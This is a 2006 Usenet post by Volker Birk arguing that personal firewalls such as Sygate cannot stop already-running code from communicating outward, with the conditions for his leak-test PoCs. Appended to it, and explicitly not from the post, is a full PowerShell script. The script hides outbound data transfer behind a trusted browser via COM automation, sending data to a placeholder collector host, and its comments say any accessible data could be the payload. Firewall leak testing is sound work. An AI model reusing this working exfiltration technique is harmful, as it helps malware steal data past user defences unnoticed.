Re: Sygate Free PFW
- From: Volker Birk <bumens@xxxxxxxxxxx>
- Date: 12 Jun 2006 09:12:05 +0200
WinTerMiNator <me@xxxxxxxxxxx> wrote:
> > No. Keep Sygate PFW. Version 5.5 build 2710 preferably
> However, since the product is no longer updated, I wonder if it is
> still a valid solution since any recently discovered flaws or
> security holes won't be fixed. Opinions? Is it a good idea to just
> switch to the windows XP SP2 firewall?

Yes.

How do you solve the mentioned security design flaws of Sygate?

> First, Windows firewall does not inform the user when an app tries to
> connect to the internet: it knows to block only inbound connections, not
> outbound ones. Volker and his fellows will tell you it is a good design
> choice!

Hm... at least I will, yes :-P

> Even if this was true, Windows firewall has definitely a big hole: when
> apps are installing, they can add an exception and so allow an *inbound*
> connection without requesting the user's authorization or even without
> informing him (her).

Yes. Don't install applications you cannot trust.

> For example, just try to install Skype 2.0, or any security product which
> needs to connect to the internet...

Yes. If the user installs this, usually she/he wants to use it. What's
wrong with it?

> This happens, of course, when the app is installed in a session where the
> user has admin rights (note that almost all windows apps require an admin
> session to be installed); it happens also when the app is installed
> invoking "runas", or when the app is launched using "Psexec" (a utility
> from Mark Russinovich) which gives the app the execution rights of the
> "SYSTEM" user.

Yes. And if an application is installed using Administrator's rights,
no "Personal Firewall" can do anything against this, if the setup is
cleverly coded.

> Of course, what legitimate apps can do, malware can also do. And several
> malware can install themselves using Psexec or a similar method and can
> so have full access to add exceptions.
> --> Windows firewall is not a firewall, it is like a sieve!

You have the same non-arguments as everyone else here who tried to
argue that way.

This is boring. Why you're totally wrong, everybody can read in older
postings in this group already. Always discussing the same thing?

If an application wants to communicate to the outside, it's no problem
to do so at all. Not only my own two PoC codes for that prove it.

> However, among PFWs, Sygate PFW is probably not the best, but the "least
> bad".

I cannot see that. Sygate has bad security design flaws, which make a
PC more insecure and not more secure compared to the Windows-Firewall.

> wants to connect is launched directly by the user or launched by another
> app; in the second case it will request the user's authorization (here is
> one of Volker's proofs of concept defeated...).

It's not. You just don't understand that my PoC code does not deal with
"how is it started". And it should not.

Why?

If Sygate managed to prevent starting malware reliably, then all
other functionality of Sygate would be superfluous. The existence of
the functionality of wanting to "control outbound traffic" is the proof
that Sygate themselves don't think that they can prevent starting
malware reliably. And they're right in this single point here; at least
malware sometimes is started by a fooled user, a victim of a social
engineering attack. So "how can it be prevented from being started"
is _not_ part of my PoC code.

I'm testing the "how good is the 'Personal Firewall', if the code already
is running" case. If you want to test my PoC code, you have to start it
and let it run, assuming that (if it were malware, which it is not)
this problem is already solved. Then you can test with it the one
and only object it's developed for: if it manages to have outbound
communication in spite of your "Personal Firewall".

And the actual implementation has ambient conditions, which you have to
implement, or you cannot use it for a test:

- you have to have a PC with Windows 2k or XP and a web-browser, which
  is allowed to be used for browsing the web (for the test
  implementation, only Internet Explorer and Mozilla Firefox 1.0.x are
  supported, while it's easy to adapt to an arbitrary browser)
- for the second test, you have to have a PC with Windows 2k or XP and
  activated Active Desktop, which may include web content

The first scenario I chose because it's very common; most of the owners
of a "Personal Firewall" will have such a scenario.

The second scenario I chose because it's the default configuration of
Windows and most of the "Personal Firewalls"; most of the owners of a
"Personal Firewall" will have such a scenario, too.

If you don't implement these ambient conditions in your testing
environment, then your tests are useless and pointless.

> It also seems to be less targeted by malware than Windows firewall.

No. Or: please give a proof.
Yours,
VB.
--
"If you want to play with a piece of windows software that makes you
click all over the place, there's always minesweeper."
Kyle Stedman about "Personal Firewalls" in c.s.f
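Added example, not part of the original post and not Volker Birk's own PoC code (the post states only the ambient conditions of his tests, not their mechanism). It illustrates the first test scenario described above: once code is already running on a machine whose "Personal Firewall" permits a browser to reach the web, that code can get outbound communication by making the permitted browser do the talking, because a per-application rule set attributes the connection to the browser's process. The script drives Internet Explorer through its COM automation object; the collector URL, the `d` query parameter and the `Send-ViaBrowser` function name are placeholders assumed for illustration.

```powershell
# Added example, not code from the post or from Volker Birk's PoC.
# Assumes: Windows with Internet Explorer installed, and an application-level
# "Personal Firewall" that already allows iexplore.exe to browse the web.
# The collector URL and the "d" parameter are placeholders for illustration.

function Send-ViaBrowser {
    param(
        [Parameter(Mandatory)] [string]$Data,
        [string]$Collector = 'http://collector.example.invalid/',  # assumed placeholder
        [int]$TimeoutSeconds = 15
    )

    # The data rides in the query string; the browser does the network I/O.
    $target = $Collector + '?d=' + [System.Uri]::EscapeDataString($Data)

    # Drive the already-permitted browser through COM automation. The socket
    # is opened by iexplore.exe, so a per-application outbound rule set that
    # trusts the browser sees nothing unusual about this script.
    $ie = New-Object -ComObject 'InternetExplorer.Application'
    try {
        $ie.Visible = $false
        $ie.Navigate($target)

        # Wait until the navigation has finished (success or an error page).
        $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
        while ($ie.Busy -and (Get-Date) -lt $deadline) {
            Start-Sleep -Milliseconds 200
        }
    }
    finally {
        $ie.Quit()
        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($ie)
    }
    return $target
}

# Anything the running code already has access to can serve as payload;
# the machine name is harmless enough for a test.
$sent = Send-ViaBrowser -Data (hostname)
Write-Host "Requested $sent through the permitted browser."
```

Run it on a machine whose firewall permits iexplore.exe and nothing else: the firewall's log, or `netstat -b` while the request is in flight, attributes the connection to iexplore.exe rather than to powershell.exe, which is exactly what the test is meant to measure. How the script was started (by the user, by another process, with or without a prompt) plays no part in that result, which is the point made above about leaving "how is it started" out of the PoC. The COM object only exists where Internet Explorer is still present, and on Vista and later with Protected Mode the automation object may detach after `Navigate` (the request still goes out), but any permitted application that can be scripted to fetch a URL gives the same result.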